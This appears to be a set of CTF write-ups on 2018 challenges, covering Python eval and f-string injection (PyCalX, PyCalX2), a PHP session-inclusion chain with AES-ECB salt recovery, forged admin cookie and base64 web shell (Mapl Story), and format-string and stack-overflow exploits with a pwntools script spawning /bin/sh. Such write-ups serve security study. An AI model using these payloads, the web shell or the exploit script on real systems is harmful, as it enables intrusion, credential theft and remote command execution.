• MeePwnCTF quals 2018 PyCalX2

    PyCalX2 was part of the MeePwnCTF Quals 2018 and consists of a webpage with 3 inputs, a value, an operator and a second value.

    You should have a look PyCalX before reading this writeup.

    Filtered input

    The code differs from PyCalX by the fact that our operation is filtered now too, this breaks our quote injection and we have to find a new way in.

    -    op = get_op(arguments['op'].value)
    +    op = get_op(get_value(arguments['op'].value))

    Fun with flags

    Well, seeing the flag of PyCalcX we get a hint for python3.6, reading the changelog we found that python3.6 intruduced a new type of format-strings, often called f-strings or Literal String Interpolation.

    With that information our new operator now is: +f


    These new format strings allow some eval-like behaviour, using {FLAG<source} we appearantly have an even easier comparison, but there is a catch, this returns True or False, which would be appended to value1 (which can’t be empty), but the script only allows outputs with digits, the word True or the word False, no combinations, nothing else.

    As a workaround we can use nesting inside the format-string, something like {"e":{FLAG<source:1}.1} would return e if FLAG<source, otherwise it would throw an exception. Setting value1 to Tru this would end up as True in one case and Invalid (because of the exception) in the other.

    Now we still can’t use quotes so we have to find a string starting with e, but that’s quite easy and our full payload for value2 now looks like this: {sys.exit.__name__:{FLAG<source:1}.1}.

    With everything in place we can now do the binary search again.

    This time we knew what was coming: MeePwnCTF{python3.6[_strikes_backkkkkkkkkkkk)}

  • MeePwnCTF quals 2018 PyCalX

    PyCalX was part of the MeePwnCTF Quals 2018 and consists of a webpage with 3 inputs, a value, an operator and a second value.

    The code for the challenge is visible on the page when source is in the GET-arguments. There is a link for that directly on the page.

    The values and operation are used inside an eval statement, which very clearly is the target of our attack.

    Filtered input

    Having a look around we’ll see that values and the operator are filtered in a few ways.

    If a value contains only digits it’s casted as integer, if it’s a string there is a blacklist for things like brackets and quotes. Furthermore instead of the string directly a repr of it (containing single-quotes which we can’t easily break) is used.

    The operator is limited to 2 characters and the first has to be one of +-/*=!.


    We can freely control the second character of the operator, so let’s make it +', that way the second value will be evaluated as code and an empty string will be appended to the first value.

    Using a second value like +source+FLAG < value1+source+source# (using the comment-character to ignore the last ' in the eval) gives us an evaluated command that effectively is equivilant to 'whatever'+''+'Mee'+'MeePwnCTF{...}' < 'whatever'+'Mee'+'Mee' (for source=Mee).

    Python considers a string “bigger” than another if there is a difference between them and the first mismatching character is bigger (in ascii) than in the comparison.

    With the example Mee would be False, but Mef is True.

    That made it very easy to use a binary search, making this process really quick.

    In the end we get the (annoyingly confusing) flag: MeePwnCTF{python3.66666666666666_([_((you_passed_this?]]]]]])}

  • MeePwnCTF quals 2018 Mapl Story

    Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage where you can name a “character” and train a pet a command. You get the code but the config is censored.

    Have a look around

    First of let’s create an account, e.g. foobar@example.org/foobar123, set any name, we’ll change that later.

    Sign in and have a look at your cookies, you’ll see your PHPSESSID and a _role. _role is generated using either sha256("admin".$salt) or (in this case) sha256("user".$salt). We need the salt to continue here.

    Have a look around the few pages on the site. The game page is completely irrelevant, just a gimmick.

    File inclusion vulnerability

    There is a file inclusion vulnerability in index.php, so have a look at e.g. /index.php?page=/etc/group. Unfortunately it uses a GET variable which is heavily escaped so for now there isn’t really much we can directly do with this bug.

    Let’s get salty

    Let’s have a look at /index.php?page=/var/lib/php/sessions/sess_PHPSESSID (replace PHPSESSID).

    You’ll see a variable called character_name. character_name is AES-128-ECB encrypted data using openssl_encrypt($data.$salt,"AES-128-ECB",$key). Since AES-128-ECB is working on 16-byte blocks and we control the start of the string (it’s the character name you can update on your settings page!) we can attack it by brute-forcing byte by byte.

    We start of setting a character name like AAAAAAAAAAAAAAA (15x’A’) and we’ll look at the first 32 characters of the hash in the session file, now we start trying printable characters at the 16. position, we’ll find a hash match at AAAAAAAAAAAAAAAm so we now the salt starts with m. Next we do the same thing with AAAAAAAAAAAAAA (14x’A’) and will get the hash and try characters again, the next match will be AAAAAAAAAAAAAAms.

    We’ll continue this until we finally get the salt: ms_g00d_0ld_g4m3.

    Becoming admin

    Becoming admin now is as simple as writing the result of sha256("admin"."ms_g00d_0ld_g4m3") into our _role cookie. After refreshing the page you’ll see the admin link appearing in the navigation bar.

    sha256("admin"."ms_g00d_0ld_g4m3") => a2ae9db7fd12a8911be74590b99bc7ad1f2f6ccd2e68e44afbf1280349205054

    Give yourself a pet

    In the admin menu you have to give yourself a pet. This will allow you to train it commands on the character page, which is just writing a text-file under "uploads/".md5($salt.$email)."/command.txt. A lot of characters are filtered and you can only write 19 characters, so you can’t really do much with this alone.

    19 characters is just barely long enough to fit a base64-encoded <?=`$_GET[1]`; (PD89YCRfR0VUWzFdYDs – slightly broken padding), which would give us a shell, but now we need a way to actually decode and execute that…

    Choose a new name

    Well, if you looked carefully at the session file you would have noticed the clear-text action part, which contains the last logged line. There is one log-line in the code-base which we can control, when giving a player a pet the log will contain the character name at the end.

    I think <?=include"$_COOKIE[0] is a beautiful name, don’t you think? So what does this do?… It allows us to include files using a cookie named 0. Since cookies are not filtered inside the script we now have full control over the file inclusion.

    Execute your first command

    Now that everything is prepared we need a final way to execute the base64-encoded php code we trained our pet earlier, but that’s really simple, PHP actually has a built-in helper for that: php://filter/convert.base64-decode/resource=path/to/file.

    In case of foobar@example.org (considering the upload path mentioned before) a command-execution now looks like this:

    Ξ ~ → curl 'http://mapl.story/?page=/var/lib/php/sessions/sess_0qlekg08c8pah3rcftjraeon24&1=ls' -H 'Cookie: 0=php://filter/convert.base64-decode/resource=upload/56cea464131b6903185abfe3d6103385/command.txt'      
    character_name|s:96:"d1f197d11ed6b3d29f08a9893429eb2bfa19e4543ff1d33bf19c5a89aec19b45080a355c37b4654ec2a5813f81dbe98b";user|s:96:"917467323f3a8e09ab1c2a2d7e3dc3ac85c0c4f08622b7e10a4ec4a18ad36e9919326131b516d9053ee8980a1230ad0e";action|s:65:"[02:27:52am GMT+7] gave blackpig to player admin.php


    From there we can take a look at dbconnect.php (&1=cat%20dbconnect.php) and we’ll find the mysql username and password:

    define('DBUSER', 'mapl_story_user');
    define('DBPASS', 'tsu_tsu_tsu_tsu'); 
    define('DBNAME', 'mapl_story');

    Now let’s see what’s in the mapl_config table that is mentioned a few times in the script (it should at least contain the encryption key):

    curl 'http://mapl.story/?page=/var/lib/php/sessions/sess_0qlekg08c8pah3rcftjraeon24&1=echo%20%27SELECT%20%2A%20FROM%20mapl_config%3B%27|%20mysql%20-umapl_story_user%20-ptsu_tsu_tsu_tsu%20mapl_story' -H 'Cookie: 0=php://filter/convert.base64-decode/resource=upload/56cea464131b6903185abfe3d6103385/command.txt' 
    character_name|s:96:"d1f197d11ed6b3d29f08a9893429eb2bfa19e4543ff1d33bf19c5a89aec19b45080a355c37b4654ec2a5813f81dbe98b";user|s:96:"917467323f3a8e09ab1c2a2d7e3dc3ac85c0c4f08622b7e10a4ec4a18ad36e9919326131b516d9053ee8980a1230ad0e";action|s:65:"[02:27:52am GMT+7] gave blackpig to player mapl_salt	mapl_key	mapl_now_get_your_flag
    ms_g00d_0ld_g4m3	You_Never_Guess_This_Tsug0d_1337	MeePwnCTF{__Abus1ng_SessioN_Is_AlwAys_C00L_1337!___}

    There we go, we got our flag MeePwnCTF{__Abus1ng_SessioN_Is_AlwAys_C00L_1337!___} :)

  • MidnightsunCTF finals 2018 glitch

    We got some 32 bit binary with the following metalogic:

    int secret = gettruerandomnum() & 0x10decafe;
    char *username = readusername();
    int guess = readguess();
    logattempt(username, guess);
    if (guess == secret)

    long story short, in the logattempt function we had a formatstring vulnerability. But we could not overwrite the secret with %n as there was no pointer to it on the stack. Also there was a small size limit for the formatstring to do anything else. The only interesting thing we could overwrite was our own guess. If we open up the man(3) page of printf we see an example for the usage of a variable argument printf("%2$*1$d", width, num);. It will print num in decimal format padded by whitespaces so it reaches the length num. Now thats something we could use. We just print something and use the secret as a padding. Then we can write the number of written bytes (correct secret) into our guess. Finally we get some payload like this %26$*26$d%15$n.

  • MidnightsunCTF finals 2018 Blinder Pwn

    We got a libc and an ip:port. It asks for a name, echos it, and the asks us what it can help us with. Then it exits. The name echoing has a formatstring vuln, the second input has a buffer overflow. There is a stack canary, the binary is 32 bit. As libc is already given exploitation is a piece of cake.

    I first dumped the stack till __libc_start_main_ret (reconnecting everytime). Knowing the static offset I could now retrieve libc base reliable with %291$p. In the stackdump I already saw something what looked like a stack canary, I confirmed this by writing one byte inside it which caused a sigsegv. So by %267$p I could retrieve the canary. Now we know everything for successfull exploitation. In the first step we leak libc and canary, in the second step we overwrite the ret pointer with system and place “/bin/sh” as the first argument on the stack. Done.

    r = remote("", 6666)
    r.recvuntil("Welcome! What is your name?")
    r.recvuntil("Hello ")
    res = r.recvuntil("What")[:-4].strip().split("_")
    libcbase = int(res[0], 16) - 0x18e81
    canary = int(res[1], 16)
    log.info("libcbase 0x{:x}".format(libcbase))
    r.recvuntil("can we help you with today?")
    r.sendline("A" * 1024 + struct.pack("<IIIIIII", canary, 0, 0, 0, libcbase + 0x3cd10, 0, libcbase + 0x17b8cf))